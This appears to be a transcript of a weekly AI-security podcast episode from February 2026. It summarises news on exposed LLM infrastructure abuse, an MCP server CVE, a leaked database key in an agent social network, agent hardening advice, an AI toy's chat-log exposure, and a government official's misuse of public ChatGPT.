This Week in AI Security - 5th February 2026

All right. Welcome back to another episode of This Week in AI security, brought to you by Firetail and the team behind the Modern Security Podcast. I've got about five or six stories to get into today. Let's get started. We're coming to you for the week of the fifth of February twenty twenty six. Here we go.

So I want to start this week's first story with something called bizarre bazaar. And that is bizarre. Like weird. Bazaar like marketplace. So bizarre bazaar rhyming intentionally. Kudos to the team over at Pillar Security for uncovering this. Now, they uncovered this by planting some honeypots that look like weakly protected MLM infrastructure end points. And what this involves is it involves threat actors gaining unauthorized access to these end points, and they are using that access to steal computing resources for cryptocurrency mining. They're also reselling API access on dark markets. So they'll say like, hey, we found this compromised Olama instance, that we have an API key to who wants to use it. Exfiltrating data from prompts and conversation history Attempting to pivot into internal systems via MCP servers MCP. We're going to talk about a little bit more in today's episode, but for those who are not familiar, that's model context protocol. It's a way of kind of exposing an LLM programmatically to other pieces of software that want to interact with it.

And the most common attack vectors are self-hosted LLM setups expose or unauthenticated APIs in front of those setups, publicly accessible MCP environments, and development or staging environments with public IP addresses. A couple of things to note here. So these aside from the exfiltration of the prompt data, these are not AI specific attacks. These are actually typical attacks on infrastructure that backs llms. And so, you know, if you think about the things we've talked about in many of the previous episodes of this week in AI security, we've got a recurring theme of the infrastructure and the services powering the LLM environment as being really kind of the weak point and the things to focus on when you're building your layer, defense or defense in depth strategies. And important to understand here is that Llms have known patterns. They have known ports that are exposed, they have known API structures, and many are, for instance, copying OpenAI as the most popular provider. They're copying OpenAI's APIs and making them compatible. So you could swap out models without having to redo your application code exposed APIs in front of this infrastructure get indexed quickly, and can be searched on Shodan. I always tell people anything on the internet can be found and generally way faster than you actually think it can be found, so it's something to really keep an eye out on. Make sure that if you're putting an LLM powered application online, you're taking appropriate measures to make sure that you're only exposing exactly the things you're tightening up security around some of that exposed infrastructure, etc..

All right, moving on to the next story. We've got a CVE on an on an MCP server. So I mentioned that we're going to talk about model context protocol a little bit. And so model context protocol is again a way for llms to interact with other Llms or for software to interact with Llms or some combination thereof. A lot of people think about it as kind of being the LLM wrapper around an API. And so the parallel that most people draw between MCC is two APIs. And what we've got here is a CV. So again a common vulnerability or enumeration on a Gemini MCP tool that allowed remote code execution. So Gemini we've talked about many many times with various things, including disclosures that the Firetail team has done, you know, very popular service from Google. Pretty common CVE, a little bit more of the same. We've talked about this theme or this category of vulnerabilities on previous episodes. I'm not going to go into more details other than to just remind you that, as always, all of our stories are linked from the show notes. You can get more information there.

All right. Moving on to our next story notebook. So we talked last week quite a lot about the cloud bot CLA w naught Claude from anthropic uh now renamed into mult bot. This is meant to be a kind of, you know, super agent for personal productivity purposes. And, you know, one of the craziest organizations over the, uh, one of the craziest developments rather over the last couple of weeks has been the launch of this and then the launch of something called MoltBook, which is like a Facebook for these AI agents to interact with each other. It actually has more of a Reddit style interface, and it's more of a kind of like, you know, comment and response. And somebody posts a thread and the conversation continues from there. And again, the vulnerabilities here and the security incident here is not specific to the LLM aspect of it. In fact, you know, the MoltBook social network was vibe coded, meaning that it was created by the creator of Mootbot who just said, hey, I have a vision for this thing. I went to an AI powered coding assistant, something like a cloud code or something like a lovable or a base forty four or one of these platforms, and I just described what I wanted, and then the the AI wrote the code for me.

So the research team over at Wizz poked around a little bit, did not take them very long to find a Supabase, which is a kind of a NoSQL database API key exposed in a client side JavaScript. They were able to then use that API key also to understand the front end interaction with the backend, get instructions on where to access the Supabase instance, then unauthenticated access to the entire production database, including one point five million API keys and lots more of data in there. So again, the infrastructure around the applications is the weak point. Are you sensing a theme? I am a little bit.

All right. Moving on. What I actually wanted to highlight for our next story is a really good write up from a noted security researcher named Eyal Estrin. I hope I'm getting that name right. Eyal is somebody whose work I followed for several years. He is a well-known researcher, especially in cloud security, in areas like that, um, based in Israel. I don't know his company affiliation at this point, but he put out a nice guide to how to secure this thing. So if you still think that the productivity gains are worth it and you want to deploy this agent for your own purposes, you might want to have a read through this guide on things to do. I'm just going to read off the kind of six to eight recommendations and talk a little bit about my analysis of them. So number one, lock down the gateway. Um, by default this multipathing will actually get access to everything. But maybe you don't want that to be the case. And also maybe you don't want it to have kind of a reverse proxy effect where it exposes things from your local machine onto the internet. So lock down that gateway.

Number two, enforce strict access control. So who can access what. Well, that also applies to this kind of agentic thing. What can it access? Number three isolate the runtime environment. This in my mind is very parallel to micro-segmentation from networks. Reduce the blast radius. So if all things do go wrong, how can you actually control and contain what this thing might have access to? Number four apply least privilege to aging capabilities. This is very much an identity focused control. Make sure that you're only granting permissions to do the things that you're comfortable with it doing. Maybe you want it to be able to create calendar events, but not read, or maybe not to edit or update, right? So think about what level of permissions you want to give this agent. Number five secure credentials and secrets. This is just good secret management. You know make sure that you're not giving it passwords in plain text. Make sure that you are using good practices like environment variables instead, or encrypting these secrets in some way.

Number five continuous or maybe number six continuous. Auditing and monitoring. Log this stuff. Log what it's doing be, you know, have have the ability to go back and check if you're concerned. Hey, did this do something that I didn't expect it to do? Well, you've got the logs. Make sure you've turned that on. Number seven hardened browser automation. The browser is one of the main things that this bot is known to use. And so what you want to do is you want to make sure that the chromium based browser automation is is secure, is good code, and is only again having access to the things you want. Number nine, I think I might have lost track prompt level safety rules. Check the prompt, give it some guidelines on what it is and is not allowed to prompt. And last but not least, incident response preparedness. So when and if and when things do go wrong, how are you going to recover from this? So think through some worst case scenarios and then just map out to yourself. Maybe you just jot it down in a notepad or something like that. What if it messes up my calendar? What if it texts some or sends out some files that I don't want it to send out? Then what am I going to do about that? The interesting thing to me from that entire list, the only AI specific controllers there in. There is prompt level safety rules. Everything else is kind of a core cybersecurity principle. Foundational thing, foundational control, micro-segmentation least privilege. Things that we would have all heard again and again and again. So again, the link is in the show notes. Nice little guide. Good read. Quick read gives you some real thoughts about what to do in a practical sense.

All right, moving on. Bondu Bondu is an AI powered dinosaur toy. I heard about this story via Australia and a news source down in Australia. I don't know if this is something that is an Australian company and hasn't made it outside Australia just yet, but it is an AI powered dinosaur toy. And again, this is the infrastructure around the application that is really to blame. So the chat logs were actually available to anyone with a Gmail account. So if you or your child was interacting with this thing, that is most likely a kind of, um, speech to text mechanism that then kind of goes back to the LM, retrieves the responses, etc. for that interaction. Fifty thousand chat log records exposed to anybody with a Gmail account. So they kind of authentication that was applied. There was really not super great super controlled.

All right. Moving on to our last story for the week. This is something that definitely hit the headlines in a lot of different places around the world. Trump's acting cyber chief uploaded sensitive files into a public version of ChatGPT. So about a year ago, a gentleman with the last name Gottumukkala was appointed as the interim head of the country's cyber defense agency, Cisa, and had requested access to ChatGPT. That access was actually not approved. Um, but an exception was granted on a temporary basis. Uh, and then this gentleman proceeded to upload four documents. Now, none of those documents were marked as classified, but they were marked for official use only. And so uploading into ChatGPT might actually be within bounds if you're using the enterprise version, but he used the public version, and the public version, as has been widely reported, has IP rights, ownerships and access to the data for training purposes and whatnot. So this is considered a pretty serious, if not security breach, let's say, data mishandling and privacy breach of potentially sensitive information.

This is the kind of thing that makes you step back for a second and say, well, wait, wait, wait, what's going on here? Are our most trusted institutions and organizations not following core basic guidelines? Or is it the case that the temptation of AI and the benefits are actually just too good to ignore? Or maybe both. I'm going to leave you with that thought to kind of ponder on your own. That's our last story for this week. Again, signing off for the week of the fifth of February twenty twenty six, as always. Rate review like. Follow. Subscribe. All that good stuff. If you've got any stories, send our way and we will talk to you next week on This Week in AI security. Bye bye.